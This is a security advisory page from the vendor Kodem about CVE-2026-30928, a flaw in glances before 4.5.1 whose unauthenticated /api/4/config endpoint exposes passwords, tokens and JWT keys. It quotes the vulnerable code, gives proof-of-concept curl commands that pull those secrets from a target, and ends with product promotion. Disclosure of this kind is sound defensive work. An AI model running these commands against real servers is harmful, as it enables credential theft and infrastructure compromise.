CVE-2026-30928

CVE-2026-30928 is a high-severity security vulnerability in glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1.

Summary

The /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords.

Details

Root Cause: The as_dict() method in config.py iterates over every section and every key in the ConfigParser and returns them all as a flat dictionary. No sensitive key filtering or redaction is applied.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 1154-1167
def _api_config(self):
    """Glances API RESTful implementation.

    Return the JSON representation of the Glances configuration file
    HTTP/200 if OK
    HTTP/404 if others error
    """
    try:
        # Get the RAW value of the config' dict
        args_json = self.config.as_dict()  # <-- Returns ALL config including secrets
    except Exception as e:
        raise HTTPException(status.HTTP_404_NOT_FOUND, f"Cannot get config ({str(e)})")
    else:
        return GlancesJSONResponse(args_json)
  • File: glances/config.py, lines 280-287
def as_dict(self):
    """Return the configuration as a dict"""
    dictionary = {}
    for section in self.parser.sections():
        dictionary[section] = {}
        for option in self.parser.options(section):
            dictionary[section][option] = self.parser.get(section, option)  # No filtering
    return dictionary
  • File: glances/outputs/glances_restful_api.py, lines 472-475 (authentication bypass)
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)  # No authentication!

PoC

  • Start Glances in default webserver mode:
glances -w
# Glances web server started on http://0.0.0.0:61208/
  • From any network-reachable host, retrieve all configuration secrets:
# Get entire config including all credentials
curl http://target:61208/api/4/config

Step 3: Extract specific secrets:

# Get JWT secret key for token forgery
curl http://target:61208/api/4/config/outputs/jwt_secret_key

# Get InfluxDB token
curl http://target:61208/api/4/config/influxdb2/token

# Get all stored server passwords
curl http://target:61208/api/4/config/passwords

Impact

Full Infrastructure Compromise: Database credentials (InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB, Cassandra) allow direct access to all connected backend data stores.

Affected versions

glances (< 4.5.1)

Security releases

glances → 4.5.1 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade glances to 4.5.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30928? CVE-2026-30928 is a high-severity security vulnerability in glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1.
  2. Which versions of glances are affected by CVE-2026-30928? glances (pip) versions < 4.5.1 is affected.
  3. Is there a fix for CVE-2026-30928? Yes. CVE-2026-30928 is fixed in 4.5.1. Upgrade to this version or later.
  4. Is CVE-2026-30928 exploitable, and should I be worried? Whether CVE-2026-30928 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-30928 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-30928? Upgrade glances to 4.5.1 or later.

Other vulnerabilities in glances

CVE-2026-53925CVE-2026-46611CVE-2026-46608CVE-2026-46607CVE-2026-46606

Stop the waste.
Protect your environment with Kodem.